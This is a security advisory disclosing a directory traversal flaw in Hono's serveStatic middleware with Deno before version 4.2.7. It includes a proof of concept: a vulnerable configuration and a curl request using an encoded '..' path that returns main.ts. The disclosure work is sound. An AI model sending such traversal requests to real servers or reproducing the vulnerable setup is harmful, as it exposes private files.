[NPM:GHSA-3MPF-RCC7-5347] Hono vulnerable to Restricted Directory Traversal in serveStatic with deno
Severity: Moderate
Affected Packages: 1
Fixed Packages: 1
CVEs: 1
Summary
When using serveStatic with Deno, it is possible to traverse directories relative to the directory where main.ts is located, because percent-encoded `..` segments in the request path are resolved against the configured root.
My environment is configured as per this tutorial: https://hono.dev/getting-started/deno
PoC
```bash
$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
    └── a.txt
```
source
```ts
import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts'
import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'

const app = new Hono()

// Vulnerable configuration (hono < 4.2.7): the root is the project directory,
// so a request path that resolves to "static/../main.ts" stays inside root
// and the file is served.
app.use('/static/*', serveStatic({ root: './' }))

Deno.serve(app.fetch)
```
request
```bash
curl localhost:8000/static/%2e%2e/main.ts
```
The response is the content of main.ts.
Impact
Unexpected files are retrieved.
Affected
| Package | Affected Version |
|---|---|
| pkg:npm/hono | < 4.2.7 |
Fixed
| Package | Fixed Version |
|---|---|
| pkg:npm/hono | = 4.2.7 |
- ID: NPM:GHSA-3MPF-RCC7-5347
- Severity: moderate
- URL: https://github.com/advisories/GHSA-3mpf-rcc7-5347
- Published: 2024-04-23T16:20:49
- Modified: 2024-04-24T14:26:48
- Rights: NPM Security Team